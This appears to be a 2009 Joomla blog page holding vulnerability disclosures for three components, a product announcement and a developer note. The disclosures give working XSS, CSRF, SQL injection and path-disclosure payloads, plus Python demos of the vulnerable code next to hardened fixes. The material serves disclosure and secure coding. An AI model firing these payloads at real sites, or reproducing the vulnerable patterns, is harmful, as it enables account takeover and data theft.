Sunday, 15 November 2009 00:00

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

  1. XSS 1: Nested [img] Tags

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. XSS 2: JavaScript links

    [url=javascript:alert('xss');]http://google.com[/url]

    Requires minimal user interaction (the victim has to click the link, since the script runs from the javascript: href).

  3. XSS 3: CSS Injection

    [color=#ff0000;font-size:expression(document.write(String.fromCharCode(88,83,83)))]XSS[/color]
  4. XSS 4: Nested [url] Tags

    Requires minimal user interaction (the onmousemove handler fires as soon as the pointer moves over the link) and the rendered post shows visible signs of tampering, but it is still technically exploitable.

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  5. CSRF: [img] Tags

    [img]http://victim-site.com/index.php?option=com_user&task=logout[/img]

    Every user who views the post makes a GET request to the embedded URL with their own session cookies, so the logout action (or any other state-changing GET endpoint on the site) is triggered on their behalf.
  6. Path Disclosure: Profile View 'id' parameter

    Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.

    index.php?option=com_ninjaboard&view=profile&id='

These issues are fixed in the latest release, and users are urged to upgrade.

Timeline

  • Vulnerabilities Discovered: 14 July 2009
  • Vendor Notified: 16 July 2009
  • Vendor Response: 16 July 2009
  • Update Available: 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:37
Sunday, 15 November 2009 00:00

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' parameter is not sanitized before it is used in a SQL query.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. BBCode [color] Tag XSS

    [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
  3. BBCode [img] Tag XSS

    [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
  4. BBCode [url] Tag XSS

    [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]
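The SQL injection in item 1 comes from concatenating 'articleId' into the query text. The following is an added example, not webee's own PHP: it rebuilds the bug in Python against an in-memory SQLite table, runs the advisory's payload through it, and shows the two fixes that matter (parameter binding, then binding plus an integer check). The table name, the column names and the sample row are constructed for the demo; the UNION in the payload implies the real query selects 12 columns, and VERSION() is MySQL, so the SQLite demo calls sqlite_version() in its place.

```python
import sqlite3

# Payload from the advisory above; VERSION() is MySQL, so this SQLite demo uses sqlite_version().
PAYLOAD = "999 union select 1,2,sqlite_version(),4,5,6,7,8,9,10,11,12 -- "
DB_VERSION = sqlite3.sqlite_version

# Constructed 12-column comments table: the payload's UNION implies the real
# query selects 12 columns, but the column names here are assumptions.
COLUMNS = ["id", "articleId", "author", "body"] + [f"field{i}" for i in range(5, 13)]


def make_db():
    """In-memory stand-in for the component's comment table, with one sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE comments ({', '.join(COLUMNS)})")
    conn.execute(
        "INSERT INTO comments VALUES (1, 42, 'alice', 'first comment', 5, 6, 7, 8, 9, 10, 11, 12)"
    )
    return conn


def comments_vulnerable(conn, article_id):
    """String concatenation, the advisory's bug class: articleId becomes part of the SQL text."""
    sql = "SELECT * FROM comments WHERE articleId = " + article_id
    return conn.execute(sql).fetchall()


def comments_bound(conn, article_id):
    """Parameter binding alone: the payload is compared as an opaque string and matches nothing."""
    return conn.execute("SELECT * FROM comments WHERE articleId = ?", (article_id,)).fetchall()


def comments_fixed(conn, article_id):
    """Binding plus type validation: reject anything that is not a positive integer."""
    if not article_id.isdigit():
        raise ValueError("articleId must be a positive integer")
    return conn.execute(
        "SELECT * FROM comments WHERE articleId = ?", (int(article_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", comments_vulnerable(db, PAYLOAD))  # third column is the DB version
    print("bound only:", comments_bound(db, PAYLOAD))       # no rows
    print("fixed     :", comments_fixed(db, "42"))
```

With the vulnerable query the payload's UNION row comes back with the database version in the third column, which is exactly what the advisory's request against index2.php demonstrates against MySQL. Binding the value is enough to stop the injection; the integer check on top of it is what turns a silent empty result into a logged, rejected request.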

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2.

Timeline

  • Vulnerabilities Discovered: 4 November 2009
  • Vendor Notified: 4 November 2009
  • Vendor Notified Again: 9 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35
Sunday, 15 November 2009 00:00

Joomla Commentator 1.1b3, a Joomla commenting plugin, suffers from an XSS vulnerability in its "title" field: the value is placed in an HTML attribute without escaping, so a double quote breaks out of the attribute and an attacker can possibly run scripts in an administrator's session.

title"/onmouseover="alert(/xss/.source)
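The Ninjaboard and webee BBCode issues above and the Commentator "title" issue are all one rendering mistake: untrusted text is substituted into HTML without being escaped for its context or validated against what the tag may legitimately hold. The block below is an added example (Python, not any of the components' PHP) showing a hypothetical naive regex renderer that reproduces the javascript: URL, CSS expression() and attribute-breakout classes, next to a hardened renderer that tokenizes the input once, escapes every non-tag byte, allow-lists URL schemes and colour values, and renders a tag as literal text whenever its argument fails validation. The payload strings are copied from the three advisories; the tag grammar (no whitespace or brackets inside a tag argument, no nesting) and all function names are assumptions of this example. The naive renderer does not reproduce the nested-tag cases, because those depend on the order in which the original component processed its tags.

```python
import html
import re
from urllib.parse import urlsplit

# Payloads quoted from the Ninjaboard, webee and Commentator advisories above.
NINJABOARD_PAYLOADS = [
    "[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]",
    "[url=javascript:alert('xss');]http://google.com[/url]",
    "[color=#ff0000;font-size:expression(document.write(String.fromCharCode(88,83,83)))]XSS[/color]",
    "[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]",
]
WEBEE_PAYLOADS = [
    "[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]",
    '[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]',
    '[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]',
]
COMMENTATOR_TITLE = 'title"/onmouseover="alert(/xss/.source)'


def render_bbcode_naive(text):
    """Hypothetical regex search-and-replace with no escaping and no validation.

    Reproduces the javascript: URL, CSS expression() and attribute-breakout
    classes; the nested-tag payloads depend on the original components' tag order.
    """
    text = re.sub(r"\[img\](.*?)\[/img\]", r'<img src="\1"/>', text)
    text = re.sub(r"\[url=(.*?)\](.*?)\[/url\]", r'<a href="\1">\2</a>', text)
    text = re.sub(r"\[url\](.*?)\[/url\]", r'<a href="\1">\1</a>', text)
    text = re.sub(r"\[color=(.*?)\](.*?)\[/color\]", r'<span style="color:\1">\2</span>', text)
    return text


SAFE_SCHEMES = {"http", "https"}
COLOR_RE = re.compile(r"#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20}")  # allow-list, no ';'
BAD_URL_CHARS = set("\"'<>`\\")

# One tokenizer pass (assumed grammar): tag arguments may not contain brackets or
# whitespace, and anything that is not a well-formed tag falls through to 'text'.
TAG_RE = re.compile(
    r"\[img\](?P<img>[^\[\]\s]+)\[/img\]"
    r"|\[url=(?P<href>[^\[\]\s]+)\](?P<label>[^\[\]]*)\[/url\]"
    r"|\[url\](?P<bare>[^\[\]\s]+)\[/url\]"
    r"|\[color=(?P<color>[^\[\]]+)\](?P<body>[^\[\]]*)\[/color\]"
    r"|(?P<text>[^\[]+|\[)"
)


def attr(value):
    """Escape a value for a double-quoted HTML attribute; what the 'title' field needed."""
    return html.escape(value, quote=True)


def safe_url(raw):
    """Accept only absolute http(s) URLs containing no quotes, angle brackets or control chars."""
    if any(c in BAD_URL_CHARS or ord(c) < 33 for c in raw):
        return None
    try:
        parts = urlsplit(raw)
    except ValueError:
        return None
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return raw


def _emit(m):
    literal = html.escape(m.group(0), quote=True)  # fallback: show the tag as plain text
    if m.group("text") is not None:
        return literal
    if m.group("img") is not None:
        url = safe_url(m.group("img"))
        return f'<img src="{attr(url)}" alt=""/>' if url else literal
    if m.group("href") is not None or m.group("bare") is not None:
        url = safe_url(m.group("href") or m.group("bare"))
        label = m.group("label") if m.group("href") is not None else url
        return f'<a href="{attr(url)}" rel="nofollow">{html.escape(label)}</a>' if url else literal
    if COLOR_RE.fullmatch(m.group("color")):
        return f'<span style="color:{m.group("color")}">{html.escape(m.group("body"))}</span>'
    return literal


def render_bbcode(text):
    """Hardened renderer: every byte of output is either validated tag markup or escaped text."""
    return TAG_RE.sub(_emit, text)


def neutralized(payload):
    """True when the hardened renderer emits the payload purely as escaped text, with no tag."""
    return render_bbcode(payload) == html.escape(payload, quote=True)


if __name__ == "__main__":
    for p in NINJABOARD_PAYLOADS + WEBEE_PAYLOADS:
        print("naive    :", render_bbcode_naive(p))
        print("hardened :", render_bbcode(p), "\n")
    print("title attr:", attr(COMMENTATOR_TITLE))
```

Two design choices carry the weight here. Escaping happens per token in a single pass, so there is no window in which a tag substituted earlier can be re-parsed by a later one, which is how nested [img] and [url] tags get through a chain of independent regex replacements. And each tag argument is checked against what it is allowed to be (an http(s) URL, a colour token) rather than against a list of bad strings, so javascript:, expression() and a stray double quote all fail for the same reason: they are not a URL or a colour.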

Timeline

  • Vulnerabilities Discovered: 3 November 2009
  • Vendor Notified: 3 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35
Sunday, 08 November 2009 18:56

I am proud to announce the release of JMyLife 1.0, a new Joomla component by yours truly! JMyLife aims to replicate the functionality of fmylife.com in a Joomla 1.5 native component!

There are 2 versions available: JMyLife 1.0 FREE, which has the bare essentials, and JMyLife 1.0 Pro, with all the bells and whistles!

View the demo here - JMyLife Component Demo.

Overview of Features

  Feature                               Free   Pro
  Guest Story Submission                Yes    Yes
  User Comment Submission               Yes    Yes
  Story Voting                          Yes    Yes
  Story Moderation                      Yes    Yes
  Comment Moderation                    Yes    Yes
  Built-in "Share on Facebook" Link     Yes    Yes
  User Comment Reporting                Yes    Yes
  reCAPTCHA on Submission Form          No     Yes
  User Favorites                        No     Yes
  Community Builder Support             No     Yes
  Submission Module                     No     Yes
  Category Menu Module                  No     Yes
  Story/Comment Search Plugin           No     Yes
  Cost                                  FREE   $20

When you purchase the Pro version, ALL minor updates (until 1.1) will be included, and you will be supporting future development of this project.

Last Updated on Thursday, 12 November 2009 11:56
Friday, 06 November 2009 23:55

I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a select item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.

Last Updated on Saturday, 07 November 2009 04:19

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
